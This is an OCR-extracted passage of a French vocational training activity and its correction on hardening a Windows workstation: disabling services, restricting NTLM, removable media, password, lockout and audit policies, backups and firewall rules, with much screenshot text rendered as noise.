Envoyer les réponses LM et NTLM : les clients utilisent 


acceptent l'authentification LM, NTLM et NTLMv2. 
Envoyer LM et NTLM - utiliser la sécurité de session NTLM 


. Les 
l'authentiication LM, NTLM et NTLMv2. 


voyer uniquement les réponses NTLM : les clients utilisent 


Pour obtenir plus d'informations sur la stratégie de sécurité et les 
fonctionnalités de Windows, visitez le site Web de Microsoft. 
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Étape 2 : Limiter les connexions réseau 


e Les objectifs de cette étape sont de limiter les fonctions d’une interface réseau et désactiver les protocoles réseau inutiles afin de limiter les attaques réseau. 


1. Afin d'examiner les fonctions d'une interface réseau et sélectionner celles qui sont utiles, sélectionnez Panneau de configuration > Réseau et Internet/Connexion 
réseau > clic droit sur l'interface réseau (Ethernet) > Propriétés. 


e Souvent, les fonctions d’une interface réseau utile pour la plupart des systèmes sont : 
e Client pour réseau Microsoft 
e Protocole Internet version 4 (TCP/IPv4) 
e Les autres options peuvent être désactivées (ou désélectionnées) : 
e Partage de fichiers et imprimantes :Utile pour les serveurs de fichiers 
e Planificateur de paquets QoS : Utile dans le cas de l'adoption de la priorisation du trafic 
e Les protocoles de découverte LLDP et topologie de la couche de liaison : Inutiles 


e Travail demandé : Désactivez les fonctions inutiles de votre interface réseau 


2. Désactivez le protocole IPV6 inutilisé comme suit : Panneau de configuration > Gestionnaire de périphériques > Menu Affichage > Afficher les périphériques 
cachés/réseau— désactivez Wan Miniport IPV6. 
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Étape 3 : Limiter les risques liés à l'usage de médias amovibles 


e Pour bloquer les attaques exploitant les médias amovibles, il est possible de désactiver la possibilité d'utilisation des médias amovibles sur les postes. 
e Pour ce faire, vous êtes appelés a: 

e Lancer gpedit.msc ; 

e Activer les deux options suivantes : 


e Configuration Ordinateur > Modèle d'administration > Système > Accès au stockage amovible > Toutes les classes de stockage amovible 
tous les accès 


WEBFORCE » 
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: refuser 


e Configuration Ordinateur > Modèle d'administration > Système > Installation de périphérique > Restriction d'installation de périphériques > 


Empécher l'installation de périphériques amovibles 
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Étape 4 : Définir un modèle de sécurité pour les comptes système 


e L'objectif de cette étape est de définir un modèle de sécurité pour les comptes systèmes 


e Pour ce faire, il vous est demandé de: 


e Configurez une politique de mots de passe des comptes comme suit : 
e La longueur des mots de passe doit être supérieur ou égale à 8 caractères composés de minuscules, de majuscules et de chiffres 
e La durée de vie maximale doit être 30 jours 
e La durée de vie minimale doit être supérieure à zéro 


e Les anciens mots de passe ne doivent pas être réutilisés en permanence (seuil égale à 24) 
e Définir un seuil de verrouillage égal à 3 échecs de connexion à tous les comptes d'utilisateurs 


e Pour configurer la stratégie demandée, il suffit de lancer Stratégie de sécurité locale > Stratégie de comptes 
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Étape 5 : Définir une stratégie d’audit 


e L'objectif principal de cette étape est d'activer et configurer la journalisation des principaux évènement exécutés dans un système. Cela permet d'identifier les sources 
de menaces lors de l'apparition d’une attaque de sécurité 


e Pour ce faire, il vous est demandé de: 
e Activer la journalisation des tentatives réussies et échouées pour les événements système 
e Activer la journalisation des tentatives réussies et échouées pour les événements de connexion au compte et la connexion événements 


e Activer uniquement la journalisation des tentatives réussies d'utilisation des privileges et d'accès aux objets 


e Pour configurer la stratégie demandée, il suffit de lancer Stratégie de sécurité locale > Stratégies locales > Stratégie d’audit 
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Étape 6 : Exécuter la restauration du système et créez un point de restauration. 


e Cette étape est importante car elle permet de créer des sauvegardes d'image système de l'ensemble d’un système d'exploitation, y compris les fichiers systèmes, les 
programmes installés et les fichiers personnels 


e Il est possible d'enregistrer l’image système sur un lecteur interne ou externe, ou sur des CD ou des DVD 


e Pour ce faire, allez dans Panneau de configuration Système et maintenance > Sauvegarde et restauration 


3 Sauvegarder et restaurer (Windows 7) 


€e ~ 4 WB « Systé... > Sauvegarder et resta... O Rechercher 


Page d'accueil du panneau de 


nes Sauvegarder ou restaurer des fichiers 


r 2 : Sauvegarder 
@ Créer une image système 


@ Créer un disque de réparation Sauvegarde Windows non configurée. @ Configurer la sauvegarde 
système 
Restaurer 


Pour cet ordinateur, Windows n'a détecté aucune sauvegarde. 


Q Choisir une autre sauvegarde comme source de restauration des fichiers 


e Dans le volet de gauche, cliquez sur Créer une image système, puis suivez les étapes 
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Etape 7 : Configurer des régles de sécurité pour le pare-feu Windows 


L'objectif de cette étape est de découvrir les étapes de configuration de nouvelles règles a un pare-feu Windows 


Pour ce faire, dans cette étape vous allez ajouter une règle au pare-feu Windows qui autorise la mise à jour du système Windows 


e En effet, parmi les bonnes pratiques de sécurité, figure celle de mettre a jour constamment le système d’exploitations 


Pour allez ajouter une règle au pare-feu Windows qui autorise la mise a jour du système Windows, vous êtes chargés de : 
e Aller dans Panneau de configuration > Pare-feu Windows > Paramètres Avancés 
e Cliquer sur Règles de trafic sortants > Nouvelle règle 
e Sélectionner Personnalisée > Services > Personnaliser > défiler la liste et trouver Windows Update > Appliquer à ce service >ok Suivant 
e Sélectionner TCP comme protocole puis cliquer suivant 
e Dans la fenêtre Action, sélectionner Autoriser la connexion puis cliquer sur suivant 
e Cocher tous les profils pour cette règle 


e Donner un nom à cette règle, "Autoriser le service Windows Update" 


Copyright - Tout droit réservé - OFPPT 


WE 


BFORCE ». 


BE THE CHANGE 


106 


Activité 4 N XO WEBFORCES. 


Correction DE THE CHANGE C” 


Étape 1 : Désactiver les services inutiles et renforcer le niveau de sécurité des services existants 


Cette figure illustre l'interface qui affiche les différents services, qui est lancée suite à l'exécution de services.msc 


& Services 
Fichier Action Affichage ? 


e9 P OBIHm|» >? sus 


A z 
Sélectionnez un élément pour obtenir Nom Description Type de démarrage 


une description. © Accès aux données utilisate... Fournit l'ac... Manuel 

©) Acquisition d'image Windo... Fournit des … Manuel 

€ Agent Activation Runtime_… Runtime for... Manuel 

KOA Agent de stratégie IPsec La sécurité … Manuel (Déclenche... 
KoA Alimentation Gère la strat... .… Automatique 

KOA Appel de procédure distant... Le service R... .… Automatique 

KoA Application système COM+ Gère la conf... Manuel 

1) Assistance IP Fournit une... .… Automatique 

©) Assistance NetBIOS sur TCP... Prend en ch... … Manuel (Déclenche... 
©) Assistant Connectivité réseau Fournit la n... Manuel (Déclenche... 
©) Assistant Connexion avec u... Autorise la... .. Manuel (Déclenche... 
©) Audio Windows Gère les péri... .… Automatique 

KO Authentification naturelle Service d'ag... Manuel (Déclenche... 
KoA BranchCache Ce service... Manuel 

© CaptureService_408ab Active la fo... Manuel 

KoA Carte à puce Gère l'accès... Manuel (Déclenche... 
a Carte de performance WMI  Fournit des... Manuel 

1}, Centre de sécurité Le service... w Automatique (débu... 
KoA Cliché instantané des volu...  Gère et impl... Manuel 

1}, Client de stratégie de groupe Le service e... .… Automatique (décle... 


KOA Client de suivi de lien distri... Conserve le... Automatique 
< 


N 
= 
m 
< 
a. 


\ Etendu { Standard 
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Étape 1 : Désactiver les services inutiles et renforcer le niveau de sécurité des services existants 


Cette figure illustre la désactivation du service Téléphonie Cette figure illustre la désactivation du service Télécopie 


Q Services 

Fichter Action Affichage 7? 

e> mia © ia G m| A L Propriétés de Téléphonie (Ordinateur local) 
Generel Connexion Fécupérmon Dépendances 


TapiSee 
Téléphone 


PE Prend en charge l'mesface TAPI (Telephony API) a DR a s pemet d'envoyer et de recevor des a 
corpiion : pour laa programmes qui cortrélent ke io Description : | éécapies, d'itiserles ressources de télécopie = 
Prend en charge l'interface TAPI R manne wr de taane n e l'arin era © bol at Vous perpet d'envoyer et de recevoir noble me na arinaa ve: Le near: 


Gea A pew is Orme ssc ra tenon ts ceils Satan rr 
C:\Windows \System J2\evchost exe + Network Serice p sur cet ordinateur ou le réseau. C_\Wiedows eyetem3Z nesvc ee 

l'ordinateur local et, via le réseau - 

iad aar Da oaa i Type de démarage : ‘Désactivé Type de démarage : Désactivé 

exécutent également le service. 


Téléphonie 
Dérmaeres le service 


Élet du service Amite 
| Supendm | Reprend Démarer | | fier Sapende | Reprendre 


Vous pouvez spécfñer les paramètres qu s appbquert au démarage du Vous pouvez soscfier les paramètres gu s acchquent eu démarage du 
service senice. 


Paramètres de démarrage : 


N 
= 
| 
< 
a. 


[oR] | amie || Aie À 
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Étape 1 : Désactiver les services inutiles et renforcer le niveau de sécurité des services existants 


Cette figure illustre la désactivation du service Carte à puce Cette figure illustre la désactivation du service Service de prise en charge Bluetooth 


Propriétés de Carte à puce (Ordinateur local) Propriétés de Service de prise en charge Bluetooth (Ordinateur local) X 


Nom du service :  bthserv 


Nom complet : Service de prise en charge Bluetooth 


Nom du service:  SCardSvr 
Nom complet : Carte à puta. 


Description : service Bluetooth prend en charge la 

m écouverte et l'association d'appareils Bluetooth 
iotarto | ‘srrdt m: la déosetivstinn da na sarvire 

Chemin d'accès des fichiers exécutables : 

C:\Windows\system32\svchost.exe k LocalService -p 


ateur. Si ce service est arrêté, cet ordinateur 


a nana nhio lira da natao 3 minao Gi na carvire 


Description : faananau Si ce sanco ef arto re 
v 

Chemin d'accès des fichiers exécutables : 

C:\Windows \system32\svchost.exe + LocalServiceAndNolmpersonation 


Type de démarage : Désactivé Type de démarrage : Désactivé 


État du service: Amété 


Démarrer || Améter | | Suspendre 


Suspendre | Reprendre 


Vous pouvez spécifier les paramètres qui s'appliquent au démarrage du 
service. 


Vous pouvez spécifier les paramètres qui s'appliquent au démarrage du 
service. 


Paramètres de démarrage : 


Paramètres de démarrage : | 


N 
= 
m 
< 
a. 


[ox] | Anue 


Co ] | Appliquer | 
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Étape 1 : Désactiver les services inutiles et renforcer le niveau de sécurité des services existants 


Cette figure illustre la désactivation du service Spouleur d’impression Cette figure illustre la désactivation du service Service Initiateur iSCSI de Microsoft 


| Propriétés de Service Initiateur iSCSI de Microsoft (Ordinateur local) 


Propriétés de Spouleur d'impression (Ordinateur local) 


Nom du service:  Spooler 
Nom complet : Spouleur d'impression 


Nom du service:  MSiSCSI 
Nom complet : Service Initiateur iSCSI de Microsoft 


Descantion : ère les sessions iSCSI (Intemet SCSI) à partir de «a 
pion; in sur les périphériques cible iSCSI 


ictante Gi re canina act =mêûté l'ardinstarnr na 


Description : e service met en spoule les travaux d'impression | 
gère l'interaction avec l'imprimante. Si vous i 
srréte? re carina umio na news? nhio imnrimear mi 
Chemin d'accès des fichiers exécutables : 
C:\Windows\System32\spoolsv.exe 


Chemin d'accès des fichiers exécutables : 
C:\Windows\system32\svchost.exe k netsvcs p 


Type de démarrage : | Désactivé 


Type de démarage : Désactivé 


État du service : Amété 
Démarrer Arrêter Suspendre Reprendre 


Vous pouvez spécifier les paramètres qui s'appliquent au démarrage du 
service. 


Paramètres de démarrage : 


État du service : En cours d'exécution 
Démarrer Arrêter | Suspendre Reprendre 


Vous pouvez spécifier les paramètres qui s'appliquent au démarrage du 
service. 


Paramètres de démarrage 


N 
= 
| 
< 
a. 


[oT] | rm 
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Étape 1 : Désactiver les services inutiles et renforcer le niveau de sécurité des services existants 


Cette figure illustre la désactivation du service Partage de connexion Internet Cette figure illustre la désactivation du service Routage et accès distant 


Propriétés de Routage et accès distant (Ordinateur local) 


Propriétés de Partage de connexion Internet (ICS) (Ordinateur local) XX 


Général Connexion Récupération Dépendances Général Connexion Récupération Dépendances 


Nom du service:  SharedAccess Nom du service : 


Nom complet : Partage de connexion Intemet (ICS) Nom complet : Routage et accès distant 


Description : aux entreprises des services de routage dans 


tion - re la traduction d'adresses de réseau, 
Description : “ad environnements de réseau local ou étendu. 


. les services de résolution de noms 


des las carvirss de nrévantinn d'intnisinn niir nin 


v 


Chemin d'accès des fichiers exécutables : 
C:\Windows\System32\svchost.exe k netsvcs 


Chemin d'accès des fichiers exécutables : 
C:\Windows\System32\svchost exe k netsvcs p 


Type de démarrage : Désactivé 


Type de démarrage : Désactivé 


État du service: Arrêté État du service: Arrêté 
| Démarrer | Arrêter Suspendre Reprendre 


Vous pouvez spécifier les paramètres qui s'appliquent au démarrage du 
service. 


Démarrer Arrêter Suspendre Reprendre 


Vous pouvez spécifier les paramètres qui s'appliquent au démarrage du 
service. 


Paramètres de démarrage 


Paramètres de démarrage : 


N 
= 
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Cette figure illustre l’amélioration du niveau de sécurité de l’authentification a distance (Sécurité réseau : niveau d'authentification du LAN Manager) en lui attribuant 
comme valeur « uniquement NTLM v2, Refuser LM » 


N 
= 
m 
< 
a. 


g Editeur de stratégie de groupe locale 


| Fichier Action Affichage ? 


lE] Stratégie Ordinateur local 
v fl Configuration ordinateur 
> Paramètres du logiciel 
v Paramétres Windows 
> (| Stratégie de résolution de noms 
(=) Scripts (démarrage/arrêt) 
> = Imprimantes déployées 
v EA Paramètres de sécurité 
> LA Stratégies de comptes 
v (@ Stratégies locales 
> [À Stratégie d'audit 
> [4 Attribution des droits utilisate 
LA Options de sécurité 
Pare-feu Windows Defender avec 
[C] Stratégies du gestionnaire de list: 
Stratégies de clé publique 


> 
> Stratégies de restriction logicielle 
> Stratégies de contrôle de l'applic 
> 3 Stratégies de sécurité IP sur Ordir 
> ©) Configuration avancée de la strat 
> alij QoS basée sur la stratégie 
z S DA Madèlec d'adminictratinn 


Stratégie 


Li Sécurité réseau : 
Li] Sécurité réseau: 
Li] Sécurité réseau : 
E Sécurité réseau : 
Gs) Sécurité réseau: 
Lx] Sécurité réseau : 


Li Sécurité réseau : 
Li] Sécurité réseau : 
Li] Sécurité réseau: 
Lx] Sécurité réseau : 
Li] Sécurité réseau : 
Li] Sécurité réseau: 
Lx] Sécurité réseau : 
Li] Sécurité réseau : 
Li] Sécurité réseau: 
Li] Sécurité réseau : 
Li] Sécurité réseau : 


Lx] Serveur réseau 
Li] Serveur réseau 
Lx Serveur réseau 


Propriétés de : Sécurité réseau : niveau d'authentification ... 


Paramètre de sécurité locale | Expliquer 


Sécurité réseau : niveau d'authentification LAN Manager 


La modification de ce paramètre peut affecter la compatibilité avec les 


clients, les services et les applications. 


Pour obtenir davantage d'informations, consultez Sécurité réseau : 


niveau d'authentification LAN Manager. (Q823659) 
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Etape 2 : Limiter les connexions réseau 


Figures illustrant la désactivation des fonctions inutiles d’une interface réseau. 


== 
ss Centre Réseau et partage 


e N baika D ss « Rése... > Centre Réseau et par... 


Page d'accueil du panneau de | @ État de Ethernet 


configuration 

Général 
Modifier les paramètres de la 
carte 


O Rechercher 


Connexion 
Connectivité IPv4 : 
Connectivité IPv6 : 
État du média : 
Durée : 

Vitesse : 


Modifier les paramètres de 
partage avancés 


Options de diffusion 
multimédia en continu 


Internet 

Pas d'accès réseau 
Activé 

00:37:51 

1,0 Gbits/s 


Envoyés —— D — Reçus 


3679801 | 


Octets : 


175 292 537 


| @Propriétés | | Désactiver | | Diagnostiquer | 


Voir aussi 
Options Internet 


Pare-feu Windows Defender 


Internet 
@ Ethernet 


e ou VPN, ou configurez un routeur ou 


cédez à des informations de 
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Propriétés de Ethernet 


Gestion de réseau 


Connexion en utilisant : 
Œ Intel(R) PRO/1000 MT Desktop Adapter 


Cette connexion utilise les éléments suivants : 


EP Client pour les réseaux Microsoft 

C Partage de fichiers et imprimantes Réseaux Microsoft 
O A Planficateur de paquets QoS 

2. Protocole Intemet version 4 (TCP/IPv4) 

C # Protocole de multiplexage de carte réseau Microsoft 
C # Pilote de protocole LLDP Microsoft 


TCP/IPv6) 


O ME Protocole Intemet version 6 | 


Installer... 
Description 
TCP/IP version 6. Demiére version du protocole Intemet permettant la 
communication entre réseaux hétérogènes interconnectés. 


Désinstaller 
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Étape 2 : Limiter les connexions réseau 


À Gestionnaire de périphériques È 


Fichier Action Affichage ? 
@ sb | m | [MR Appareils par type 
Appareils par connexion 
Appareils par conteneur 
Ressources par type 
Ressources par connexion 


DESKTOP 
v E Autres 
Bi Per 
> $ Batteri 
> Cartes 
< M- Cartes MA Afficher les périphériques cachés 
g inte 
P Mic. 
gF WAN Miniport (IKEv2) 
i WAN Miniport (IP) 
@® WAN Miniport (IPv6) 
P WAN Miniport (L2TP) 
@® WAN Miniport (Network Monitor) 
UP WAN Miniport (PPPOE) 
& WAN Miniport (PPTP) 
UP WAN Miniport (SSTP) 
EE Claviers 
i| Contrôleurs sudio, vidéo et jeu 
Ë Contrôleurs de bus USB 
> Sq Contrôleurs de stockage 
> Contrôleurs IDE ATA/ATAPI 
@ Entrées et sorties audio 
ER Files d'attente à l'impression : 
> = Lecteurs de disque 
> À Lecteurs de DVD/CD-ROM 


Personnaliser. 


N 
= 
| 
< 
a. 


KO 
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Figures illustrant la désactivation de Wan Miniport IPV6 


A Gestionnaire de périphériques 


Fichier Action Affichage ? 


WE 
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#9|\(\nIS|IBm|BIEx® 


v A DESKTOP-429)ET7 
v & Autres périphériques 
ER Périphérique système de base 
> 3 Batteries 
> EH Cartes graphiques 
v EM Cartes réseau 
FF Intel(R) PRO/1000 MT Desktop Adapter 
E Microsoft Kernel Debug Network Adapter 
FF WAN Miniport (IKEv2) 
SF WAN Miniport (IP) 
SA WAN Minipor ‘1-51 
SF WAN Minipor Mettre à jour le pilote 
SF WAN Minipor 
@® WAN Minipor 
g WAN Minipor 
SF WAN Minipor 
E Claviers 
if Contrôleurs audic, 
9 Contréleurs de bus USB 
Lu Contrôleurs de stockage 
à Contrôleurs IDE ATA/ATAPI 
if Entrées et sorties audio 
MA Files d'attente à l'impression: 
Lecteurs de disque 
Lecteurs de DVD/CD-ROM 


Désinstaller l'appareil 
Rechercher les modifications sur le matériel 


Propriétés 


Désactive l'appareil sélectionné. 
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Étape 3 : Limiter les risques liés à l'usage de médias amovibles 


Figures illustrant l'activation de l'option Toutes les classes de stockage amovible : refuser tous les accès 


® Toutes les classes de stockage amovible : refuser tous les accès m] x 


LE] Editeur de stratégie de groupe locale 


Fichier Action Affichage ? Ea routes es classe de Stockage amovible -rehusar tous Les accs | PRE | | Paramètre suivant 


ed AmBB mY 


v (5) Système 2 ] © Activé 


Accès au stockag | O Désactivé 
Accès au stockag Toutes les classes de stockage Paramètre te en Come ms 


Affichage amovible : refuser tous les accès (| Définir le délai (en secondes) avant de forcer le redér 


O Non configuré Commentaire : 


Au minimum Windows Vista 


App-V odifier le paramètre de stratéaie IN El CD et DVD: refuser a en exécution 
Appel de procédi (| CD et DVD: refuser l'accès en lecture 
Assistance a distz Configuration requise : l=] CD et DVD: refuser l'accès en écriture Permet de configurer l'accès à toutes les classes de stockage 
Assistance en cas Au minimum Windows Vista (=) Classes personnalisées : refuser l'accès en lecture amovible. 


Assistant de stocl s [2] Classes personnalisées : refuser l'accès en écriture Ce paramètre de stratégie a priorité sur les paramètres de 
Audit d g Description : = : a ae stratégie individuels relatifs au stockage amovible. Pour gérer des 
udit de creation Permet de configurer l'accès à (| Lecteurs de disquettes : refuser l'accès en exécution classes individuelles, utilisez les paramètres de stratégie 


Cache NV de disc || toutes les classes de stockage =] Lecteurs de disquettes : refuser l'accès en lecture a sae 


Complexité du cc amovible. [| Lecteurs de disquettes : refuser l'accès en écriture Si vous activez ce paramètre de stratégie, aucun accès n'est 
DCOM autorisé aux classes de stockage amovible. 


E Délégation d'info EEE z à p; . ` ae 
= ua et diz priorité —_ les paramètres de Ez sees eats : refuser | -S = loitas configurez pas, les accès en lecture et écriture sont autorisés 
z è stratégie individuels relatifs au (2) Disques amovibles : refuser l'accès en écriture pour l'ensemble des classes de stockage amovible. 
Device Guard stockage amovible. Pour gérer des 
| Fermeture classes individuelles, utilisez les 


“| Fournisseur de cl paramètres de stratégie a LL 
= Gestion de l'alim correspondant à chaque classe. UE) Lecteurs de bandes : refuser l'accès en exécution 


E Gestion de la con si oa ` 
i vous activez ce paramètre de zA 7 er Pane 
C Gestionnaire de s stratégie, aucun accès n'est v = SS 


Infrastructure de ¥ || autorisé aux classes de stockage < | Annuler | | Appliquer 


Aide: 


Ce paramétre de stratégie a [| Disques amovibles : refuser l'accès en exécution 
Si vous désactivez ce paramètre de stratégie ou si vous ne le 


esc d vible : refuser tou 


l=] Tout stockage amovible : permet l'accès direct pendi 


{:] Lecteurs de bandes : refuser l'accès en lecture 


PARTIE 2 
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Étape 3 : Limiter les risques liés à l'usage de médias amovibles 


|=! Éditeur de stratégie de groupe locale 


Fichier Action Affichage ? 


Figures illustrant l'activation de l'option Empêcher l'installation de périphériques amovibles 


28 u ml Y 


Affichage 
> (5 App-V 
Appel de procédi 
LA Assistance à diste 
Assistance en cas 
F Assistant de stocl 
LA Audit de création 
LA Cache NV de disc 
E Complexité du ce 
> DCOM 
Délégation d'info 
> Dépannage et diz 
Device Guard 
Fermeture 
LA Fournisseur de cl 
> Gestion de l'alim 
> Gestion de la con 
Gestionnaire de s 
Infrastructure de 
v Installation de pé 
C} Restrictions d 


N 
= 
| 
< 
[a 


Installation de pil ¥ 


Sélectionnez un élément pour obtenir 
une description. 


Paramètre 


{=} Autoriser les administrateurs à passer outre les stratégie 
UE) Permettre l'installation de périphériques à l'aide de pilot 
UE) Empécher l'installation de périphériques à l'aide de pilot 
UE) Afficher un message personnalisé lorsque l'installation ¢ 
UE) Afficher un message personnalisé lorsque l'installation ¢ 
UE) Autoriser l'installation de périphériques correspondant ¿ 
{=} Empécher l'installation de périphériques correspondant 
(=| Autoriser l'installation de périphériques correspondant à 
(=) Empécher l'installation de périphériques correspondant 
liż] Délai (en secondes) pour forcer le redémarrage afin d'ap 
UE) Empécher l'installation de périphériques amovibles 

(| Empécher l'installation de périphériques non décrits par 


Copyright - Tout droit réservé - OFPPT 


® Empécher l'installation de périphériques amovibles 


FE Empécher l'installation de périphériques amovibles 
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O Non configuré Commentaire : 
© Activé 
O Désactivé 


Pris en charge sur: | AU minimum Windows Vista A 


Aide: 


Ce paramètre de stratégie empêche Windows d'installer des 
périphériques amovibles. Un périphérique est considéré comme 
étant amovible lorsque le pilote du périphérique auquel il est 
connecté indique que le périphérique est amovible. Par exemple, 
un périphérique USB (Universal Serial Bus) est déclaré amovible 
par les pilotes du concentrateur USB auquel le périphérique est 
connecté. Ce paramètre de stratégie prévaut sur tout autre 
paramètre de stratégie autorisant l'installation de périphériques 
par Windows. 


Si vous activez ce paramètre de stratégie, Windows ne peut pas 
installer de périphériques amovibles et les pilotes des 


périphériques amovibles existants ne peuvent pas être mis à jour. 


Si vous activez ce paramètre de stratégie sur un serveur Bureau à 
distance, il a une incidence sur la redirection des périphériques 
amovibles spécifiés depuis un client Bureau à distance vers le 
serveur Bureau à distance. 


Si vous désactivez ce paramètre de stratégie ou ne le configurez 
pas, Windows peut installer ou mettre à jour les pilotes des 
périphériques amovibles conformément aux autorisations ou 
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Étape 4 : Définir un modèle de sécurité pour les comptes système 


L'interface de configuration de la stratégie de mot de passe 


BR Stratégie de sécurité locale 


Fichier Action Affichage ? 


e 9| ail X8|\e m 


à Paramètres de sécurité Stratégie Paramètre de sécurité 


v [à Stratégies de comptes Li] Conserver l'historique des mots de passe 0 mots de passe mémori... 


> Ba = demot der Lx] Durée de vie maximale du mot de passe 42 jours 
> LA Stratégie de verrouillage du comp 


> LA Stratégies locales 

> ©) Pare-feu Windows Defender avec fon 
Stratégies du gestionnaire de listes de 

> [Ñ Stratégies de clé publique 

> © Stratégies de restriction logicielle 

> © Stratégies de contrôle de l'application 

> 3 Stratégies de sécurité IP sur Ordinate 

> [Ñ Configuration avancée de la stratégie 


Lx] Durée de vie minimale du mot de passe 0 jours 

Lx] Enregistrer les mots de passe en utilisant un chiffrement rév... Désactivé 

Lx] Le mot de passe doit respecter des exigences de complexité Désactivé 

Lx] Longueur minimale du mot de passe 0 caractère(s) 
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ba bom de 1 tana 8 


Durée de vie maximale d’un mot de passe configurée égale à 30 jours 


Propriétés de : Durée de vie maximale du mot de passe 
Paramètre de sécurité locale Expliquer 


E. Durée de ass du mot de passe 


Le mot de passe expirera dans : 
30) =) jours 
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Correction | JFPPT DE THE CHANGE 


Étape 4 : Définir un modèle de sécurité pour les comptes système 


Durée de vie minimale d’un mot de passe configurée égale à 5 jours Longueur minimale d’un mot de passe configurée égale à 8 caractères 


Propriétés de: Durée de vie minimale du mot de passe 


Propriétés de : Longueur minimale du mot de passe 


Parama} de sécurité locale Expliquer 


Paramètre de sécurité locale Expliquer 


Durée de vie minimale du mot de passe Longueur minimale du mot de passe 


Le mot de passe peut être modifié après : 


5 s jours 


Le mot de passe doit faire au minimum : 
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Correction j 


Étape 4 : Définir un modèle de sécurité pour les comptes système 


Activation de l'option de vérification de complexité d’un mot de passe 


Propriétés de: Le mot de passe doit respecter des exigenc..  ? X 


Paramètre de sécunité locale | Expliquer 


Le mot de passe doit respecter des exigences de complexité 
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a Pam def eee 


Restreindre l’utilisation d’un ancien mot de passe avec un seuil égal à 24 


Propriétés de : Conserver l'historique des mots de passe 
Paramètre de sécurité locale | Expliquer 


Conserver l'historique des mots de passe 


Conserver l'historique du mot de passe pendant : 


= | mots de passe mémorisés 
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Étape 4 : Définir un modèle de sécurité pour les comptes système 


Interface illustrant la configuration de la nouvelle stratégie de mot de passe 


B Stratégie D locale 


Fichier Action Affichage ? 


ET ERE: 


a Paramètres de sécurité 
v LA Stratégies de comptes 
> LĄ Stratégie de mot de passe 
> LA Stratégie de verrouillage du comp 
> L& Stratégies locales 
> ©) Pare-feu Windows Defender avec fon 
C] Stratégies du gestionnaire de listes de 
C] Stratégies de clé publique 
C] Stratégies de restriction logicielle 
E] Stratégies de contrôle de l'application 
3 Stratégies de sécurité IP sur Ordinate 
E Configuration avancée de la stratégie 


A 


Stratégie 

Lx] Conserver l'historique des mots de passe 
Lx] Durée de vie maximale du mot de passe 
Lx] Durée de vie minimale du mot de passe 


Lx] Enregistrer les mots de passe en utilisant un chiffrement rév... 


Lx] Le mot de passe doit respecter des exigences de complexité 
Lx] Longueur minimale du mot de passe 
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Paramètre de sécurité 


24 mots de passe mémo... 
30 jours 

5 jours 

Désactivé 

Activé 

8 caractère(s) 
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Activité 4 \\ haard WEBFORCE » 


Correction OFPPT DE THE CHANGE C^ 


Étape 4 : Définir un modèle de sécurité pour les comptes système 


Interfaces illustrant la configuration d’un seuil de verrouillage égal à 3 échecs de connexion a tous les comptes d'utilisateurs. 


B Stratégie de sécurité locale 
Fichier Action Affichage ? 
e| alm S| 


& Paramètres de sécurité 


v M Stratégies d ar ie} Durée de verrouillage des comptes Non applicable 
> LA Stratégie de mot de passe 


A zi = Uy) Réinitialiser le compteur de verrouillages du compte après Non applicable 
> mam uiage cone Lx] Seuil de verrouillage du compte 0 tentatives d'ouvertures... 
> [à Stratégies locales 


Propriétés de : Seuil de verrouillage du compte 


A 


Stratégie Paramètre de sécurité 


> ©) Pare-feu Windows Defender avec fon 
C] Stratégies du gestionnaire de listes de 

> © Stratégies de clé publique 

> ©) Stratégies de restriction logicielle 

> ©) Stratégies de contrôle de l'application 

> & Stratégies de sécurité IP sur Ordinatet 

> © Configuration avancée de la stratégie 


g + tertetives d'ouvertures de session non valdes 
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Correction 


Étape 4 : Définir un modèle de sécurité pour les comptes système 


Interfaces illustrant la configuration de la nouvelle stratégie de verrouillage de comptes 


Modifications suggérées pour les valeurs x 


Puisque la valeur de Seuil de verrouillage du compte est maintenant 3 tentatives d'ouvertures de 
session non valides, les paramètres des éléments suivants seront modifiés pour prendre les valeurs 
Stratégie 
2) Durée de verrouillage des comptes 
Li] Réinitialiser le compteur de verrouilla.... 
< 


Paramètres de stratégie Paramètres suggérés 


Non applicable 30 minutes 
Non applicable 30 minutes 
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B Stratégie de sécurité locale 


Fichier Action Affichage ? 


KO 
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BE THE C HANGE 


9/2 m5) | 
E Paramètres de sécurité 
v [A Stratégies de comptes 
> LA Stratégie de mot de passe 
> LĄ Stratégie de verrouillage du comp 
> [4 Stratégies locales 
> Pare-feu Windows Defender avec fon 
Stratégies du gestionnaire de listes de 
> (5) Stratégies de clé publique 
> [Ñ Stratégies de restriction logicielle 
> [Ñ Stratégies de contrôle de l'application 
> 3 Stratégies de sécurité IP sur Ordinate 
> © Configuration avancée de la stratégie 


Stratégie 


Lx] Durée de verrouillage des comptes 
Li] Réinitialiser le compteur de verrouillages du compte après 


Li] Seuil de verrouillage du compte 


Paramètre de sécurité 


30 minutes 
30 minutes 


3 tentatives d'ouvertures. 
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Correction 
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Cette figure illustre l'interface permettant la configuration de la stratégie d’audit 


B Stratégie de sécurité locale 


“ Fichier Action Affichage ? 


Étape 5 : Définir une stratégie d’audit 


Cette figure illustre l’activation de la journalisation des tentatives 
réussies et échouées pour les événements système. 


Propriétés de : Auditer les événements système 


e 9| 27 X58|H 


& Paramètres de sécurité 
v LA Stratégies de comptes 
> LA Stratégie de mot de passe 
> [LA Stratégie de verrouillage du comp 
v [A Stratégies locales 
> LĄ Stratégie d'audit 
TÀ Attribution des droits utilisateur 
TÀ Options de sécurité 
> © Pare-feu Windows Defender avec fon 
(5) Stratégies du gestionnaire de listes de 
> 11 Stratégies de clé publique 
> © Stratégies de restriction logicielle 
> [Ñ Stratégies de contrôle de l'application 
> 3 Stratégies de sécurité IP sur Ordinate 
> © Configuration avancée de la stratégie 


Stratégie 
au service d annuaire 
Li] Auditer l'accès aux objets 
Li] Auditer l'utilisation des privilèges 
Lx] Auditer la gestion des comptes 
Lx] Auditer le suivi des processus 
Lx] Auditer les événements de connexion 
Li] Auditer les événements de connexion aux comptes 
Li] Auditer les événements système 
Lx] Auditer les modifications de stratégie 


Paramètre de sécunté locale | Expliquer 
Paramètre de sécurité Audier les événements système 
Pas d'audit 
Pas d'audit 
Pas d'audit 
Pas d'audit 
Pas d'audit 
Pas d'audit 
Pas d'audit 
Pas d'audit 


Auditer les tentatives des types suivants : 
M] Réussite 
MA Échec 


EN ll est possible que ce paramètre ne soit pas appliqué si une autre 
daa stratégie est configurée pour avoir la priorité sur la stratégie d'audit 
au niveau de la catégorie. 
Pour obtenir davantage d informations, consultez Auditer les 
événements système. (Q921468) 
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Activité 4 


Correction 


Étape 5 : Définir une stratégie d’audit 


Cette figure illustre l’activation de la journalisation des tentatives réussies 
et échouées pour les événements de connexion 


Propriétés de : Auditer les événements de connexion 


